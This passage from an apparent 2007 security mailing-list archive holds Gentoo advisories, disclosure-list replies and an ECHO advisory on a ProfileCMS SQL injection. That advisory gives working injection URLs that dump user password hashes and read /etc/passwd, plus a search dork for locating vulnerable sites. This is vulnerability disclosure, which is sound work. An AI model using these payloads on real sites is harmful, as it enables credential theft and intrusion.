  [ 11 ] CVE-2007-5617
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5617
  [ 12 ] GLSA-200606-02
 http://www.gentoo.org/security/en/glsa/glsa-200606-02.xml
  [ 13 ] GLSA-200702-06
 http://www.gentoo.org/security/en/glsa/glsa-200702-06.xml
  [ 14 ] GLSA-200704-11
 http://www.gentoo.org/security/en/glsa/glsa-200704-11.xml
  [ 15 ] GLSA-200705-15
 http://www.gentoo.org/security/en/glsa/glsa-200705-15.xml
  [ 16 ] GLSA-200707-11
 http://www.gentoo.org/security/en/glsa/glsa-200707-11.xml
  [ 17 ] VMSA-2007-0006

http://list

[ GLSA 200711-27 ] Link Grammar: User-assisted execution of arbitrary code

2007-11-19 Thread Pierre-Yves Rofes
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200711-27
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Link Grammar: User-assisted execution of arbitrary code
  Date: November 18, 2007
  Bugs: #196803
ID: 200711-27

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


A buffer overflow vulnerability has been discovered in Link Grammar.

Background
==

The Link Grammar parser is a syntactic parser of English, based on link
grammar, an original theory of English syntax.

Affected packages
=

---
 Package/  Vulnerable  /Unaffected
---
  1  dev-libs/link-grammar < 4.2.4-r1  >= 4.2.4-r1

Description
===

Alin Rad Pop from Secunia Research discovered a boundary error in the
function separate_sentence() in file tokenize.c when processing an
overly long word which might lead to a stack-based buffer overflow.

Impact
==

A remote attacker could entice a user to parse a specially crafted
sentence, resulting in the remote execution of arbitrary code with the
privileges of the user running the application. Note that this
vulnerability may be triggered by an application using Link Grammar to
parse sentences (e.g. AbiWord).

Workaround
==

There is no known workaround at this time.

Resolution
==

All Link Grammar users should upgrade to the latest version:

  # emerge --sync
  # emerge --ask --oneshot --verbose ">=dev-libs/link-grammar-4.2.4-r1"

References
==

  [ 1 ] CVE-2007-5395
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5395

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200711-27.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHQMZauhJ+ozIKI5gRAnveAJ4xF3udOAcBALkj2nx+sLtpProAQwCfYMtX
4y5wv2ftAZ6PDwA0/uaInlg=
=p0Qn
-END PGP SIGNATURE-


[ GLSA 200711-25 ] MySQL: Denial of Service

2007-11-19 Thread Pierre-Yves Rofes
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200711-25
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: MySQL: Denial of Service
  Date: November 18, 2007
  Bugs: #198988
ID: 200711-25

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


A Denial of Service vulnerability was found in MySQL.

Background
==

MySQL is a popular multi-threaded, multi-user SQL server.

Affected packages
=

---
 Package   /   Vulnerable   /   Unaffected
---
  1  dev-db/mysql  < 5.0.44-r2>= 5.0.44-r2

Description
===

Joe Gallo and Artem Russakovskii reported an error in the
convert_search_mode_to_innobase() function in ha_innodb.cc in the
InnoDB engine that leads to a failed assertion when handling
CONTAINS operations.

Impact
==

A remote authenticated attacker with ALTER privileges could send a
specially crafted request to a vulnerable database server possibly
leading to a Denial of Service.

Workaround
==

There is no known workaround at this time.

Resolution
==

All MySQL users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-db/mysql-5.0.44-r2"

References
==

  [ 1 ] CVE-2007-5925
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5925

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200711-25.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHQLPVuhJ+ozIKI5gRAvNFAJwMO0s6m2J1Bcqq+ijMED9FAWgMewCZAVmB
lM7jI2TrO3q//snoBFgHL6U=
=OVzF
-END PGP SIGNATURE-


Re: [Full-disclosure] Microsoft Jet Engine MDB File Parsing Stack Overflow Vulnerability

2007-11-19 Thread jf
Is it? If I recall correctly, the HexView advisory was the result of
something like a word-to-byte truncation followed by a byte
sign-extension (but it's been long enough that I may be misremembering
it).

In this advisory it was not entirely clear what the condition was; from
what I remember reading of it the other day, it didn't get into how/why,
it just used ecx or a register as a counter but didn't show how it came
to that value.

What's interesting is that patching the HexView bug itself is trivial
from the assembly (not taking into account the work involved in binary
patching itself), and I know many organizations attempted to put a lot
of pressure on to get it patched and failed to do so.

On Sun, 18 Nov 2007, Juha-Matti Laurio wrote:

> Date: Sun, 18 Nov 2007 01:58:02 +0200 (EET)
> From: Juha-Matti Laurio <[EMAIL PROTECTED]>
> To: CaseArmour.net Security Administrator <[EMAIL PROTECTED]>,
> bugtraq@securityfocus.com, [EMAIL PROTECTED],
> [EMAIL PROTECTED]
> Subject: Re: [Full-disclosure] Microsoft Jet Engine MDB File Parsing Stack
> Overflow Vulnerability
>
> There is a well-known unpatched code execution type vulnerability reported 
> originally in msjet40.dll version 4.00.8618.0 too.
> This issue reported by HexView is known since March 2005:
>
> http://www.securityfocus.com/bid/12960
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0944
>
> We probably don't see a fix for this issue.
>
> - Juha-Matti
>
> "CaseArmour.net Security Administrator" <[EMAIL PROTECTED]> kirjoitti:
> > It would be useful to know if this is also an issue with msjet40.dll
> > 4.0.9510.0 (Windows Server 2003 SP2 + hotfixes).  I have an installer
> > for Windows XP SP2 that -- seems -- to cleanly apply Windows Server 2003
> > SP2's MDAC 2.82.  I haven't been able to give it a serious, hard testing
> > because I don't have many apps that still use MDAC.
> >
> > On Fri, 16 Nov 2007 19:25:29 +0800, "cocoruder" <[EMAIL PROTECTED]>
> > said:
> > >
> > > (C:\Windows\System32\msjet40.dll, version is 4.0.8618.0)
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>


Vulnerability Hash Database - Maillist

2007-11-19 Thread Sowhat
Hi All

I have created a Google Group named "Vulnerability Hash Database", for fun ;)

I think I do not need to explain more about what it is used for.

You are welcome to post your hashes of vulnerabilities/POCs to this list.

You can visit this maillist @ http://groups.google.com/group/vulnhashdb

To subscribe to this maillist, please send email to
[EMAIL PROTECTED]
or go to the following webpage:
http://groups.google.com/group/vulnhashdb/subscribe?hl=en

Comments and suggestions are welcome!

-- 
Sowhat
http://secway.org
"Life is like a bug, Do you know how to exploit it ?"


[ GLSA 200711-26 ] teTeX: Multiple vulnerabilities

2007-11-19 Thread Pierre-Yves Rofes
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200711-26
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: teTeX: Multiple vulnerabilities
  Date: November 18, 2007
  Bugs: #198238
ID: 200711-26

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Multiple vulnerabilities have been discovered in teTeX, possibly
allowing the execution of arbitrary code or the overwriting of
arbitrary files.

Background
==

teTeX is a complete TeX distribution for editing documents.

Affected packages
=

---
 Package /   Vulnerable   / Unaffected
---
  1  app-text/tetex  < 3.0_p1-r6  >= 3.0_p1-r6

Description
===

Joachim Schrod discovered several buffer overflow vulnerabilities and
an insecure temporary file creation in the "dvilj" application that is
used by dvips to convert DVI files to printer formats (CVE-2007-5937,
CVE-2007-5936). Bastien Roucaries reported that the "dvips" application
is vulnerable to two stack-based buffer overflows when processing DVI
documents with long \href{} URIs (CVE-2007-5935). teTeX also includes
code from Xpdf that is vulnerable to a memory corruption and two
heap-based buffer overflows (GLSA 200711-22); and it contains code from
T1Lib that is vulnerable to a buffer overflow when processing an overly
long font filename (GLSA 200710-12).

Impact
==

A remote attacker could entice a user to process a specially crafted
DVI or PDF file which could lead to the execution of arbitrary code
with the privileges of the user running the application. A local
attacker could exploit the "dvilj" vulnerability to conduct a symlink
attack to overwrite arbitrary files.

Workaround
==

There is no known workaround at this time.

Resolution
==

All teTeX users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=app-text/tetex-3.0_p1-r6"

References
==

  [ 1 ] CVE-2007-5935
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5935
  [ 2 ] CVE-2007-5936
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5936
  [ 3 ] CVE-2007-5937
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5937
  [ 4 ] GLSA 200710-12
http://www.gentoo.org/security/en/glsa/glsa-200710-12.xml
  [ 5 ] GLSA 200711-22
http://www.gentoo.org/security/en/glsa/glsa-200711-22.xml

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200711-26.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHQLzwuhJ+ozIKI5gRAuMZAJ40tEV0hf7XFRtCwJhjzwuJ/75oFgCfRMrI
bs1VAbnkmR5l9BS9vJviuDs=
=ECPJ
-END PGP SIGNATURE-


[ GLSA 200711-24 ] Mozilla Thunderbird: Multiple vulnerabilities

2007-11-19 Thread Pierre-Yves Rofes
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200711-24
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Mozilla Thunderbird: Multiple vulnerabilities
  Date: November 18, 2007
  Bugs: #196481
ID: 200711-24

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Multiple vulnerabilities have been reported in Mozilla Thunderbird,
which may allow user-assisted arbitrary remote code execution.

Background
==

Mozilla Thunderbird is a popular open-source email client from the
Mozilla project.

Affected packages
=

---
 Package  /  Vulnerable  /  Unaffected
---
  1  mozilla-thunderbird  < 2.0.0.9 >= 2.0.0.9
  2  mozilla-thunderbird-bin  < 2.0.0.9 >= 2.0.0.9
---
 2 affected packages on all of their supported architectures.
---

Description
===

Multiple vulnerabilities have been reported in Mozilla Thunderbird's
HTML browser engine (CVE-2007-5339) and JavaScript engine
(CVE-2007-5340) that can be exploited to cause a memory corruption.

Impact
==

A remote attacker could entice a user to read a specially crafted email
that could trigger one of the vulnerabilities, possibly leading to the
execution of arbitrary code.

Workaround
==

There is no known workaround at this time for all of these issues, but
some of them can be avoided by disabling JavaScript.

Resolution
==

All Mozilla Thunderbird users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose
">=mail-client/mozilla-thunderbird-2.0.0.9"

All Mozilla Thunderbird binary users should upgrade to the latest
version:

# emerge --sync
# emerge --ask --oneshot --verbose
">=mail-client/mozilla-thunderbird-bin-2.0.0.9"

References
==

  [ 1 ] CVE-2007-5339
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5339
  [ 2 ] CVE-2007-5340
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5340
  [ 3 ] GLSA 200711-14
http://www.gentoo.org/security/en/glsa/glsa-200711-14.xml

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200711-24.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHQK+juhJ+ozIKI5gRAvrmAJwIT9nGWtqALR9wOwqrpfCozEOVRgCfR36N
iiySbPAelqZNMW6jkMzSt6w=
=6BMP
-END PGP SIGNATURE-


[ECHO_ADV_84$2007] ProfileCMS <= 1.0 Remote SQL Injection Vulnerability

2007-11-19 Thread erdc
ECHO_ADV_84$2007


-

[ECHO_ADV_84$2007] ProfileCMS <= 1.0 Remote SQL Injection Vulnerability

-


Author : M.Hasran Addahroni

Date   : November 17th, 2007

Location   : Australia, Sydney

Web: http://advisories.echo.or.id/adv/adv84-K-159-2007.txt

Critical Lvl   : Dangerous

Impact : System access

Where  : From Remote

---


Affected software description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Application   : ProfileCMS  

version   : <= 1.0

Vendor: http://profilecms.com/

Description :


ProfileCMS is a powerful Content Management System for Social Networking 
profile codes and widgets. There are no other scripts that offer the freedom, 
features and practicality of ProfileCMS; we have constructed an easy to use, 
accessible platform for both webmasters and front end users. Based on the 
popular MSCMS system, which has been the Number 1 Myspace Content Management 
System for almost 1 year now, ProfileCMS allows webmasters to take advantage of 
the ever growing popularity of social networking sites and offer users codes 
and widgets from ANY social network.


---


Vulnerability:

~~~~~~~~~~~~~~


Input passed to the "id" parameter in the profiles-codes, video-codes, and 
arcade-games modules is not properly verified before being used in an SQL query. 

This can be exploited through the browser to obtain the MD5 password hashes of users.

Successful exploitation requires that "magic_quotes" is off.



Poc/Exploit:

~~~~~~~~~~~~


http://target.com/index.php?app=profile-codes&action=codes&id=-1%20union%20select%201,2,concat(id,0x3a,username,0x3a,password,0x3a,email),4,5,6,7,8,9,10%20from%20users/*

http://target.org/index.php?app=video-codes&action=videos&id=-1%20union%20select%201,concat(id,0x3a,username,0x3a,password,0x3a,email),3,4,5,6%20from%20users/*

http://target.net/index.php?app=arcade-games&action=games&id=-1%20union%20select%201,concat(id,0x3a,username,0x3a,password,0x3a,email),3,4,5,6%20from%20users/*

http://target.net/index.php?app=arcade-games&action=games&id=-1%20union%20select%201,load_file(0x2f6574632f706173737764),3,4,5,6%20from%20users/*


Dork:



Google: "Powered By ProfileCMS v1.0" or "Total Generators & Widgets"

Altavista.com : "Total Generators & Widgets"



Solution:

~~~~~~~~~


- Edit the source code to ensure that input is properly verified.

- Turn on magic_quotes in php.ini
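The flaw described under "Vulnerability" and the first fix listed above, shown as an added example; this is not ProfileCMS code, and the `codes` table, PDO connection and function names are assumptions. It also shows why the second fix is a weak one: magic_quotes only escapes quote characters, and a numeric "id" context needs none.

```php
<?php
// Added example, not ProfileCMS source. Assumes a MySQL table `codes`
// reached through PDO; the connection details below are placeholders.

// Vulnerable shape: the "id" request parameter is concatenated into the
// query unchanged, so its value is parsed as SQL rather than as data.
// magic_quotes_gpc would only backslash-escape quotes and backslashes;
// an integer comparison needs neither, so it does not help here.
function get_codes_vulnerable(PDO $db, string $id): array
{
    $sql = "SELECT * FROM codes WHERE id = " . $id;
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened shape: enforce the type the application actually expects,
// then pass the value as a bound parameter so it can never be parsed
// as part of the statement. With the legacy mysql_* API the minimal
// equivalent of the first step is `$id = (int) $_GET['id'];`.
function get_codes_hardened(PDO $db, string $id): array
{
    if (!ctype_digit($id)) {
        throw new InvalidArgumentException('id must be a positive integer');
    }
    $stmt = $db->prepare('SELECT * FROM codes WHERE id = :id');
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Usage for a request like index.php?app=profile-codes&action=codes&id=...
$db = new PDO('mysql:host=localhost;dbname=profilecms', 'dbuser', 'dbpass', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // server-side prepared statements
]);
try {
    $rows = get_codes_hardened($db, $_GET['id'] ?? '');
} catch (InvalidArgumentException $e) {
    http_response_code(400);
    exit('Bad request');
}
```

A request carrying `id=-1 union select ...` fails the `ctype_digit` check and is rejected before any query is built.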

 


Timeline:




- 15-11-2007 bug found

- 15-11-2007 vendor contacted

- 17-11-2007 publish advisory

---


Shoutz:



~ ping - my dearest wife, 'zizou' zautha - my lovely son, for all the luv, the 
tears n the breath

~ y3dips,the_day,m0by,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v, 
az01,negative,the_hydra, str0ke

~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,baylaw

~ SinChan,h4ntu,cow_1seng,sakitjiwa, m_beben, rizal, cR4SH3R, madkid, kuntua, 
stev_manado, nofry,ketut,x16

~ [EMAIL PROTECTED]

~ #aikmel #e-c-h-o @irc.dal.net


---

Contact:

~~~~~~~~


 K-159 || echo|staff || eufrato[at]gmail[dot]com

 Homepage: http://k-159.echo.or.id/


 [ EOF ] --



Re: Microsoft Jet Engine MDB File Parsing Stack Overflow Vulnerability

2007-11-19 Thread Juha-Matti Laurio

There is also a well-known unpatched code execution type vulnerability, reported 
originally in msjet40.dll version 4.00.8618.0.
This issue, reported by HexView, has been known since March 2005:

http://www.securityfocus.com/bid/12960
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0944

We probably don't see a fix for this issue.

- Juha-Matti

"CaseArmour.net Security Administrator" <[EMAIL PROTECTED]> wrote: 

It would be useful to know if this is also an issue with msjet40.dll
4.0.9510.0 (Windows Server 2003 SP2 + hotfixes).  I have an installer
for Windows XP SP2 that -- seems -- to cleanly apply Windows Server 2003
SP2's MDAC 2.82.  I haven't been able to give it a serious, hard testing
because I don't have many apps that still use MDAC.

On Fri, 16 Nov 2007 19:25:29 +0800, "cocoruder" <[EMAIL PROTECTED]>
said:
>
> (C:\Windows\System32\msjet40.dll, version is 4.0.8618.0)